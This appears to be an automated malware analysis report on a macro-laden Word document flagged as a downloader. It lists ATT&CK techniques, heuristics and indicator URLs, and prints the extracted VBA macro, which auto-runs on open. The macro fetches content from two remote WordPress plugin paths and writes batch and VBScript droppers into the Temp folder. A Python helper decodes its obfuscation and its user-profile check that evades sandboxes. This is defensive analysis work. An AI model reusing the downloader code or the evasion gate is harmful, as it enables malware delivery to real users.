Verdict: MALICIOUS
Risk Score: 370
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample carries VBA auto-execution entry points (AutoOpen, Auto_Open and Workbook_Open are all flagged; in the extracted ThisDocument module Workbook_Open simply calls Auto_Open, which calls the worker routine ahsduiwhdqiu), so the macro code runs as soon as the document is opened with macros enabled. Note that Workbook_Open and Auto_Open are Excel entry-point names inside what the module attributes (VB_Base = "1Normal.ThisDocument") identify as a Word document; the AutoOpen finding is the Word-side entry and does not appear in the visible part of the preview. The worker routine, whose Module1 helpers are flagged for CreateObject() and Shell() calls, fetches a text resource from 'http://peakperformancelifestyle.com/wp-content/plugins/6612536153.txt', falls back to 'http://penis-enhancement-secrets.com/wp-content/plugins/6612536153.txt' when the first returns nothing, splits named fields (text10, text20, stext1 ...) out of the response, and writes a batch file and a VBScript into the user's Temp directory. A second resource, lns.txt on the same host, is embedded verbatim into that VBScript, which also references two .png URLs on savepic.su. This is downloader behaviour: the document contains no payload, only the logic to retrieve, stage and execute one.
Heuristics (11)

| Finding | Severity | ID | Description |
|---|---|---|---|
| ClamAV: Doc.Downloader.Generic-6698421-0 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0 |
| VBA macros detected (7 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| AutoOpen macro | high | OLE_VBA_AUTOOPEN | AutoOpen macro |
| Workbook_Open macro | high | OLE_VBA_WBOPEN | Workbook_Open macro |
| Auto_Open macro | high | OLE_VBA_AUTO | Auto_Open macro |
| CreateObject call | high | OLE_VBA_CREATEOBJ | CreateObject call |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable. |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) |
| Legacy WordBasic auto-exec macro marker | medium | OLE_LEGACY_WORDBASIC_AUTOEXEC | OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. |
| Embedded URL | info | EMBEDDED_URL | One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. |

The WordBasic row carries the rule's generic description; for this sample a VBA project was recovered (see the extracted macros.bas below), so treat that finding only as an additional AutoOpen string marker, not as evidence of a WordBasic-only document.

Embedded URLs, all found in document text (OLE body). The first four are the downloader's retrieval and fallback locations and are the network indicators worth hunting for:

- http://peakperformancelifestyle.com/wp-content/plugins/lns.txt
- http://penis-enhancement-secrets.com/wp-content/plugins/lns.txt
- http://peakperformancelifestyle.com/wp-content/plugins/6612536153.txt
- http://penis-enhancement-secrets.com/wp-content/plugins/6612536153.txt

The remaining URLs are XML namespace identifiers (RDF, Dublin Core and Adobe XMP from an embedded image's metadata, plus the DrawingML schema); they are never contacted and are not indicators:

- http://www.w3.org/1999/02/22-rdf-syntax-ns#
- http://ns.adobe.com/xap/1.0/
- http://purl.org/dc/elements/1.1/
- http://ns.adobe.com/photoshop/1.0/
- http://ns.adobe.com/xap/1.0/mm/
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
- http://ns.adobe.com/tiff/1.0/
- http://ns.adobe.com/exif/1.0/
- http://schemas.openxmlformats.org/drawingml/2006/main
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8055 bytes | d9a0e2f88c3f0f4c9e017e7db13fd78d080564177efad7356a7738ef17b4d45d |
Preview of the extracted script (labelled as its first 1,000 lines; the rendering below is cut off earlier, in the middle of a Module1 call).

Reading the string arithmetic in ahsduiwhdqiu(): PH2 is the Temp directory plus a backslash (Module1.Bad("Temp") presumably resolves the environment variable, which matches the Environ() finding), and PSFL, VBFL and BAFL are one stem FL2 (returned by the truncated Module1.Whqwhdbgh(30000)) with ".ps1", ".vbs" and ".bat" appended: Chr(50 - 4) and the Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0 sum both evaluate to 46, the dot, and Chr(97 + Sgn(5)) + "a" + Right(HYWDAX, 1) spells "bat". SPIC is "http://savepic.su/", FF is "8.exe", and WVR is %USERPROFILE%. The gate value hudhw is Val of "2 0 0" or "1 3 0" (Val drops blanks, giving 200 or 130) depending on whether the profile path contains "sers\", and 129 + 60.123 \ Int("2") - 29 - hudhw reduces to 130 - hudhw, so the visible branch that writes the .bat and .vbs runs only when %USERPROFILE% does not contain "sers\"; what happens otherwise is in the truncated remainder. Note that Module1.Spice() is called for the remote content before any of this, so a sandbox with a C:\Users profile still produces the two HTTP requests even if it never sees the dropped files.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Workbook_Open()
Auto_Open
End Sub
Sub HUhdkqwudhqwkhqwjd()
ahsduiwhdqiu
End Sub
Sub Auto_Open()
ahsduiwhdqiu
End Sub
Sub ahsduiwhdqiu()
Dim huwe, auwd As Integer
Dim fileNumber As Integer
Dim retVal As Variant
HUWQD = Module1.Whqwhdbgh(30000)
FL2 = HUWQD
HPPSDJ = "Temp"
PH2 = Module1.Bad("" & HPPSDJ) + "\"
NDUWGD = "78192737129361298"
HYWDAX = "baklajskdlajsdjaiwhdkt"
JWIDJIAAA = "" + Chr(97 + Sgn(5)) + "a"
HUYFEA = JWIDJIAAA + Right(HYWDAX, 1)
WKDOQ = NDUWGD
PSFL = FL2 + "" & "." + "p" + "" + Chr(Asc("s")) _
+ _
"1"
VBFL = FL2 + Chr(50 - 4) + "v" + "b" & "s"
huwe = 1
BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA
INTG = "" & "o" & "bject"
AFTG = "m" & "odule"
SXE = "" & Chr(Asc(".")) & Chr(101) & "xe" & ""
GNG = ".png"
PHT = "" & "htt" & "p://" & ""
SPIC = PHT + "sav" & "epic.su/"
QIWJD = PSFL
PSPTH = PH2 + QIWJD
VBPTH = PH2 + VBFL
BAPTH = PH2 + BAFL
DRT = 230
BFT = 231
CFT = 232
DFT = 233
EFT = 234
Dim PBIn As String, asdwq As String, MIWDWQ As String
PBIn = "http://peakperformancelifestyle.com/wp-content/plugins/6612536153.txt"
CONT = Module1.Spice(PBIn)
asdwq = CONT
HQUWDAAA = "0"
If (asdwq = "") Then
PBIn = "http://penis-enhancement-secrets.com/wp-content/plugins/6612536153.txt"
CONT = Module1.Spice(PBIn)
asdwq = CONT
HQUWDAAA = "1"
End If
CONT = Module1.Puqwndkqwb(asdwq)
TVT10 = Module1.Tort(CONT, "text10")
TVT20 = Module1.Tort(CONT, "text20")
TVT21 = Module1.Tort(CONT, "text21")
TVT30 = Module1.Tort(CONT, "text30")
TVT31 = Module1.Tort(CONT, "text31")
XPT1 = Module1.Tort(CONT, "stext1")
XPT2 = Module1.Tort(CONT, "stext2")
XPT3 = Module1.Tort(CONT, "stext3")
WVR = Module1.Bad("US" & "ERP" & "ROFILE")
UQHWDUQHWIUHDUIWQ = "qklwjeklqwje kqwlej 2j1ikej 21lkej 1j2lke"
IHQHWDUIQWHDUI = "kj2h jk2h1j 3k12h "
hufehu1 = ""
hufehu1 = 0 + InStr(WVR, "sers\")
Dim hudhw As Integer
Dim ghdAdd(1 To 3)
ghdAdd(1) = "1"
ghdAdd(2) = "0"
ghdAdd(3) = "0"
If (hufehu1 <> 0) Then
ghdAdd(1) = "2"
Else
ghdAdd(2) = "3"
End If
JHWQUD = Join(ghdAdd)
hudhw = Val(JHWQUD)
Module1.WaitFor (1)
MIWDWQ = "http://peakperformancelifestyle.com/wp-content/plugins/lns.txt"
If (HQUWDAAA = "1") Then
MIWDWQ = "http://penis-enhancement-secrets.com/wp-content/plugins/lns.txt"
End If
SEXX = Module1.Spice(MIWDWQ)
PSTB = PBIn + "123123123"
STAR1 = SPIC + "5603061" + GNG
STAR2 = SPIC + "5599989" + GNG
FFQ = "8"
FF = FFQ + SXE
Dim ashduqwihdq As Integer
ashduqwihdq = Val(129 + 60.123 \ Int("2") - 29 - hudhw)
If (ashduqwihdq = 0) Then
Open BAPTH For Output As #DRT
Print #DRT, XPT1
Print #DRT, ":lqwjdjqiw"
Print #DRT, ":lwijdsji"
Print #DRT, "set trfd=" + Chr(34) + PH2 + Chr(34)
Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
Print #DRT, XPT2
Close #DRT
Module1.WaitFor (1)
Open VBPTH For Output As #BFT
Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
Print #BFT, XPT3
Close #BFT
Modul
... (truncated)
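To make the obfuscated assignments above concrete, the following added example (not the analyzer's code and not part of the sample) re-implements just enough of VBA's built-ins in Python to evaluate the string arithmetic and the gating expression of ahsduiwhdqiu(), then renders what the Print # statements would lay down on disk. Two things are assumptions because they are truncated in the preview: Module1.Whqwhdbgh(30000) is treated as yielding a file stem and Module1.Bad(name) as reading an environment variable, so both are passed in as parameters; the remote fields (XPT1..XPT3, the lns.txt body) are left as placeholders.

```python
"""Evaluate the string-building and gating arithmetic of ahsduiwhdqiu().
Added example; VBA built-ins are re-implemented only as far as the macro uses them."""
import math
import re

# --- VBA built-ins --------------------------------------------------------
def Chr(n): return chr(int(n))
def Asc(s): return ord(s[0])
def Sgn(x): return (x > 0) - (x < 0)
def Fix(x): return math.trunc(x)                  # truncates toward zero
def Int(x): return math.floor(float(x))           # Int("2") -> 2, as VBA coerces the string
def Right(s, n): return s[-n:] if n else ""
def InStr(s, sub): return s.find(sub) + 1         # 1-based position, 0 when absent
def Join(items, delim=" "): return delim.join(items)
def IntDiv(a, b):                                 # VBA "\": operands rounded to integers first
    return math.trunc(round(a) / round(b))
def Val(x):                                       # Val strips blanks, then reads a leading number
    s = str(x).replace(" ", "").replace("\t", "")
    m = re.match(r"[+-]?\d+(?:\.\d+)?", s)
    if not m:
        return 0
    return float(m.group()) if "." in m.group() else int(m.group())

# --- the macro's own assignments -----------------------------------------
def build_names(FL2: str, PH2: str) -> dict:
    """Mirror the variable assignments at the top of ahsduiwhdqiu().
    FL2 = assumed file stem, PH2 = assumed Temp path with trailing backslash."""
    HYWDAX = "baklajskdlajsdjaiwhdkt"
    JWIDJIAAA = "" + Chr(97 + Sgn(5)) + "a"                  # Chr(98) = "b" -> "ba"
    HUYFEA = JWIDJIAAA + Right(HYWDAX, 1)                     # "ba" + "t"  -> "bat"
    PSFL = FL2 + "" + "." + "p" + "" + Chr(Asc("s")) + "1"   # <stem>.ps1
    VBFL = FL2 + Chr(50 - 4) + "v" + "b" + "s"               # Chr(46) = "." -> <stem>.vbs
    huwe = 1
    BAFL = FL2 + Chr(Sgn(Fix(-22.043)) + 11 + 10 + 25 + huwe + 0) + HUYFEA  # -1 + 47 = 46 -> <stem>.bat
    SXE = "" + Chr(Asc(".")) + "exe" + ""                    # ".exe"
    PHT = "" + "htt" + "p://" + ""
    SPIC = PHT + "sav" + "epic.su/"                          # "http://savepic.su/"
    GNG = ".png"
    FFQ = "8"
    return {
        "ps1": PH2 + PSFL, "vbs": PH2 + VBFL, "bat": PH2 + BAFL,
        "exe_name": FFQ + SXE,                                # "8.exe", staged under PH2 by the VBScript
        "stage_urls": [SPIC + "5603061" + GNG, SPIC + "5599989" + GNG],
    }

def write_branch_taken(userprofile: str) -> bool:
    """The If (ashduqwihdq = 0) gate that guards the .bat/.vbs drop.
    userprofile = assumed value of %USERPROFILE% (Module1.Bad("USERPROFILE"))."""
    hufehu1 = 0 + InStr(userprofile, "sers\\")               # non-zero for C:\Users\... profiles
    ghdAdd = ["1", "0", "0"]                                  # Dim ghdAdd(1 To 3), shifted to 0-based
    if hufehu1 != 0:
        ghdAdd[0] = "2"
    else:
        ghdAdd[1] = "3"
    hudhw = Val(Join(ghdAdd))                                 # "2 0 0" -> 200, "1 3 0" -> 130
    ashduqwihdq = Val(129 + IntDiv(60.123, Int("2")) - 29 - hudhw)  # 60 \ 2 = 30, so 130 - hudhw
    return ashduqwihdq == 0

def dropped_script_templates(names: dict, PH2: str, FL2: str) -> dict:
    """Lines the Print # statements write; remote fields stay as placeholders."""
    bat = ["<XPT1>", ":lqwjdjqiw", ":lwijdsji",
           'set trfd="%s"' % PH2, 'set nmsj="%s"' % FL2, 'set exds="8"', "<XPT2>"]
    vbs = ['strRT = "<contents of lns.txt>"',
           'statRT = "%s"' % names["stage_urls"][0],
           'jfeuygq = "%s"' % names["exe_name"],
           'strTecation = "%s"+jfeuygq' % PH2, "<XPT3>"]
    return {names["bat"]: "\r\n".join(bat), names["vbs"]: "\r\n".join(vbs)}

if __name__ == "__main__":
    temp = "C:\\Users\\analyst\\AppData\\Local\\Temp\\"    # constructed path
    names = build_names("6612536153", temp)                   # stem is a placeholder
    print(names)
    print("drop branch on C:\\Users profile:", write_branch_taken("C:\\Users\\analyst"))
    for path, body in dropped_script_templates(names, temp, "6612536153").items():
        print("==", path); print(body)
```

The string labels that survive deobfuscation (":lqwjdjqiw", "strTecation", "jfeuygq", "set nmsj=") are stable hunting material for the dropped .bat and .vbs in %Temp%, and the gate result is worth recording when a detonation does not reproduce the drop.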